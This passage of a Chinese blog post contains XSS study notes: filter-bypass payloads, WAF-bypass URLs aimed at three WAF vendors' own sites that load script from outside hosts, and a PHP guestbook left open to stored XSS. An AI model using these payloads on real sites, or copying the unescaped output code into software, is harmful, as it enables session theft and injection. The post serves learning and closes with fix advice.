<h2 id="8、赋值拼接"><a href="#8、赋值拼接" class="headerlink" title="8、赋值拼接"></a>8、赋值拼接</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src onerror=_=alert,_(1)&gt;</span><br><span class="line">&lt;img src x=al y=ert onerror=top[x+y](1)&gt;</span><br><span class="line">&lt;img src onerror=top[a=&#x27;al&#x27;,b=&#x27;ev&#x27;,b+a](&#x27;alert(1)&#x27;)&gt;</span><br><span class="line">&lt;img src onerror=[&#x27;ale&#x27;+&#x27;rt&#x27;].map(top[&#x27;ev&#x27;+&#x27;al&#x27;])[0][&#x27;valu&#x27;+&#x27;eOf&#x27;]()(1)&gt;</span><br></pre></td></tr></table></figure>



<h2 id="9、火狐IE专属"><a href="#9、火狐IE专属" class="headerlink" title="9、火狐IE专属"></a>9、火狐IE专属</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;marquee onstart=alert(1)&gt;</span><br></pre></td></tr></table></figure>



<h2 id="10、拆分法"><a href="#10、拆分法" class="headerlink" title="10、拆分法"></a>10、拆分法</h2><p>当 Web 应用程序对目标用户的输入长度进行了限制时，这时无法注入较长的xss攻击向量，但是特定情况下，这种限制可以通过拆分法注入的方式进行绕过。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;a=&#x27;document.write(&quot;&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;a=a+&#x27;&lt;script src=ht&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;a=a+&#x27;tp://test.com/xs&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;a=a+&#x27;s.js&gt;&lt;/script&gt;&quot;)&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;eval(a)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>通过上面的拆分法可以拼凑出下面完整的攻击向量：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.write(&quot;&lt;script src = http://test.com/xss.js&gt;&lt;/script&gt;&quot;)</span><br></pre></td></tr></table></figure>



<h1 id="六、绕过-waf-拦截"><a href="#六、绕过-waf-拦截" class="headerlink" title="六、绕过 waf 拦截"></a>六、绕过 waf 拦截</h1><h3 id="1、安全狗"><a href="#1、安全狗" class="headerlink" title="1、安全狗"></a>1、安全狗</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://www.safedog.cn/index/privateSolutionIndex.html?tab=2&lt;video/src/onerror=top[`al`%2B`ert`](1);&gt;</span><br><span class="line">http://www.safedog.cn/index/privateSolutionIndex.html?tab=2&lt;video/src/onerror=appendChild(createElement(&quot;script&quot;)).src=&quot;//z.cn&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2、D盾"><a href="#2、D盾" class="headerlink" title="2、D盾"></a>2、D盾</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://www.d99net.net/News.asp?id=126&lt;video/src/onloadstart=top[`al`%2B`ert`](1);&gt;</span><br><span class="line">http://www.d99net.net/News.asp?id=126&lt;video/src/onloadstart=top[a=&#x27;al&#x27;,b=&#x27;ev&#x27;,b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);&gt;</span><br></pre></td></tr></table></figure>

<h3 id="3、云锁-奇安信-waf"><a href="#3、云锁-奇安信-waf" class="headerlink" title="3、云锁+奇安信 waf"></a>3、云锁+奇安信 waf</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1&lt;video/src/onloadstart=top[`al`%2B`ert`](1);&gt;</span><br><span class="line">http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1&lt;video/src/onloadstart=top[a=&#x27;al&#x27;,b=&#x27;ev&#x27;,b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);&gt;</span><br></pre></td></tr></table></figure>



<p>参考链接：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/340080.html">xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户</a></p>
<h1 id="七、一个持久性xss例子"><a href="#七、一个持久性xss例子" class="headerlink" title="七、一个持久性xss例子"></a>七、一个持久性xss例子</h1><p>网站源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$servername = &quot;localhost&quot;;</span><br><span class="line">$username = &quot;root&quot;;</span><br><span class="line">$password = &quot;root&quot;;</span><br><span class="line">$dbname = &quot;messages&quot;;</span><br><span class="line"> </span><br><span class="line">// 创建数据库连接</span><br><span class="line">$conn = new mysqli($servername, $username, $password, $dbname);</span><br><span class="line">if ($conn-&gt;connect_error) &#123;</span><br><span class="line">    die(&quot;数据库连接失败：&quot; . $conn-&gt;connect_error);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">if ($_SERVER[&quot;REQUEST_METHOD&quot;] == &quot;POST&quot;) &#123;</span><br><span class="line">    $name = $_POST[&quot;name&quot;];</span><br><span class="line">    $message = $_POST[&quot;message&quot;];</span><br><span class="line">    $sql = $conn -&gt; prepare(&quot;INSERT INTO message (name, message) VALUES (?, ?)&quot;);</span><br><span class="line">    $sql -&gt; bind_param(&#x27;ss&#x27;, $name, $message);</span><br><span class="line">    if ($sql -&gt; execute()) &#123;</span><br><span class="line">        echo &#x27;留言成功&#x27;;</span><br><span class="line">        header(&quot;Location: liuyanban.php?success=1&quot;);</span><br><span class="line">        exit();</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;留言失败：&quot; . $conn-&gt;error;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 处理删除请求</span><br><span class="line">if (isset($_GET[&#x27;delete_id&#x27;])) &#123;</span><br><span class="line">    $delete_id = intval($_GET[&#x27;delete_id&#x27;]);</span><br><span class="line">    $sql = &quot;DELETE FROM message WHERE id = $delete_id&quot;;</span><br><span class="line">    if ($conn-&gt;query($sql) === TRUE) &#123;</span><br><span class="line">        header(&quot;Location: liuyanban.php?deleted=1&quot;);</span><br><span class="line">        exit();</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;删除失败：&quot; . $conn-&gt;error;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;留言板&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1&gt;欢迎来到我的留言板&lt;/h1&gt;</span><br><span class="line">&lt;h2&gt;发表留言&lt;/h2&gt;</span><br><span class="line"> &lt;form method=&quot;POST&quot; action=&quot; &lt;?php echo htmlspecialchars($_SERVER[&quot;PHP_SELF&quot;]);?&gt;&quot;&gt;</span><br><span class="line">     &lt;label for=&quot;name&quot;&gt;姓名：&lt;/label&gt;</span><br><span class="line">     &lt;input type=&quot;text&quot; name=&quot;name&quot; id=&quot;name&quot;&gt;&lt;br&gt;</span><br><span class="line">     &lt;label for=&quot;message&quot;&gt;留言内容：&lt;/label&gt;</span><br><span class="line">     &lt;textarea name=&quot;message&quot; id=&quot;message&quot;&gt;&lt;/textarea&gt;&lt;br&gt;</span><br><span class="line">     &lt;input type=&quot;submit&quot; value=&quot;提交&quot;&gt;</span><br><span class="line"> &lt;/form&gt;</span><br><span class="line">&lt;hr&gt;</span><br><span class="line"> &lt;h2&gt;留言列表&lt;/h2&gt;</span><br><span class="line"> &lt;/body&gt;</span><br><span class="line"></span><br><span class="line"> &lt;?php</span><br><span class="line"> $sql = &quot;SELECT * FROM message&quot;;</span><br><span class="line"> $result = $conn-&gt;query($sql);</span><br><span class="line"></span><br><span class="line"> if ($result-&gt;num_rows &gt; 0) &#123;</span><br><span class="line">     while ($row = $result-&gt;fetch_assoc()) &#123;</span><br><span class="line">         echo &quot;&lt;p&gt;&quot;;</span><br><span class="line">         echo &quot;姓名：&quot; . $row[&quot;name&quot;] . &quot;&lt;br&gt;&quot;;</span><br><span class="line">         echo &quot;留言：&quot; . $row[&quot;message&quot;];</span><br><span class="line">         echo &#x27;&lt;a href=&quot;liuyanban.php?delete_id=&#x27; . $row[&quot;id&quot;] . &#x27;&quot; onclick=&quot;return confirm(\&#x27;确认删除这条留言吗？\&#x27;);&quot;&gt;删除&lt;/a&gt;&#x27;;</span><br><span class="line">         echo &quot;&lt;/p&gt;&quot;;</span><br><span class="line">     &#125;</span><br><span class="line"> &#125; else &#123;</span><br><span class="line">     echo &quot;暂无留言&quot;;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> // 关闭数据库连接</span><br><span class="line"> $conn-&gt;close();</span><br><span class="line"> ?&gt;</span><br></pre></td></tr></table></figure>

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20241016195117368.png" alt="image-20241016195117368" style="zoom: 33%;" />

<p>我们在name输入xss攻击代码：</p>
<p><img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20241016195355594.png" alt="image-20241016195355594"></p>
<p>成功弹窗</p>
<p><img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20241016195406999.png" alt="image-20241016195406999"></p>
<p>因为这个字段是插入到数据库中的，并且网站源码自动会查询所有内容，我们即使刷新页面，也会发生弹窗。如果要修复这个漏洞，首先在数据库中删除这个xss代码，然后在源码引入防御框架或过滤手段。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/12/08/XSS%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0/" data-id="cm4fqsklf0000e7x076jl8cuh" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2024/12/08/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/12/">December 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/12/08/XSS%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/12/08/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>